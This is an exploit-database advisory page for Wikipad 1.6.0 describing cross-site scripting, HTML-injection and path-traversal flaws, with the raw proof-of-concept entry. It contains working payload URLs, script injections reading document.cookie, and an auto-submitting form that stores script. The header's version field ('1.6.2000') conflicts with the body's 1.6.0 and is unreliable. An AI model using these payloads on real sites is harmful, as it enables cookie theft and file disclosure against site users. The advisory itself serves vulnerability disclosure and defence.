Wikipad Multiple Vulnerabilities

vendor:

Wikipad

by:

SecurityFocus

4.3

CVSS

MEDIUM

Cross-site Scripting, HTML-injection, Information-disclosure

79, 80, 200

CWE

Product Name: Wikipad

Affected Version From: 1.6.2000

Affected Version To: 1.6.2000

Patch Exists: YES

Related CWE: N/A

CPE: a:wikipad:wikipad

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Wikipad Multiple Vulnerabilities

Wikipad is prone to a cross-site scripting vulnerability, an HTML-injection vulnerability, and an information-disclosure vulnerability. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information. Information-disclosure can be exploited by accessing a URL such as http://www.example.com/pages.php?id=./../../../../../txt_file. Cross-site scripting can be exploited by accessing a URL such as http://www.example.com/pages.php?id=index"><script>alert(document.cookie)</script> or http://www.example.com/pages.php?action=edit&id=27-01-2011"><script>alert(document.cookie)</script>. HTML-injection can be exploited by submitting a form with malicious code such as <input type="hidden" name="data[text]" value='text"><script>alert(document.cookie)</script>'> and then submitting the form with a script such as <script>document.main.submit();</script>.

Mitigation:

Users should avoid following untrusted links and should never submit sensitive information to untrusted websites. Administrators should disable the affected application until a patch is applied.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46383/info

Wikipad is prone to a cross-site scripting vulnerability, an HTML-injection vulnerability, and an information-disclosure vulnerability.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and obtain sensitive information.

Wikipad 1.6.0 is vulnerable; other versions may also be affected. 

Information-disclosure:

http://www.example.com/pages.php?id=./../../../../../txt_file

Cross-site scripting:

http://www.example.com/pages.php?id=index"><script>alert(document.cookie)</script>
http://www.example.com/pages.php?action=edit&id=27-01-2011"><script>alert(document.cookie)</script>

HTML-injection:

<form action="http://host/pages.php?action=edit&id=index&title=index" method="post" name="main">
<input type="hidden" name="data[text]" value=&#039;text"><script>alert(document.cookie)</script>&#039;>
</form>

<script>
document.main.submit();
</script>